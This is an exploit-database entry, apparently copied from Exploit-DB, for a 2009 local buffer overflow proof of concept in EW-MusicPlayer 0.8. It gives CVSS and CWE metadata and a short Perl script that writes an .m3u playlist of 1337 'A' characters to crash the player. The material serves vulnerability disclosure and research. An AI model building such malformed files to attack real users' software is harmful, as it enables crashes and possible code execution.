EW-MusicPlayer0.8 (.M3U File) Local Buffer Overflow PoC

vendor:

EW-MusicPlayer

by:

SirGod

7,5

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: EW-MusicPlayer

Affected Version From: 0.8

Affected Version To: 0.8

Patch Exists: YES

Related CWE: N/A

CPE: a:ew-musicplayer:ew-musicplayer:0.8

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

EW-MusicPlayer0.8 (.M3U File) Local Buffer Overflow PoC

This PoC creates a file named 'sirgod.m3u' with 1337 characters of 'A' which can be used to exploit a buffer overflow vulnerability in EW-MusicPlayer0.8.

Mitigation:

Update to the latest version of EW-MusicPlayer0.8.

Source

Exploit-DB raw data:

#####################################################################################################
#                    EW-MusicPlayer0.8 (.M3U File) Local Buffer Overflow PoC
#                 Discovered by SirGod  -  www.mortal-team.net & www.h4cky0u.org
#         Download : http://www.brothersoft.com/ew-musicplayer-download-97163.html
######################################################################################################
my $chars= "A" x 1337;
my $file="sirgod.m3u";
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $chars;
close($FILE);
print "$file was created";
print "SirGod - www.mortal-team.net & www.h4cky0u.org";

# milw0rm.com [2009-05-04]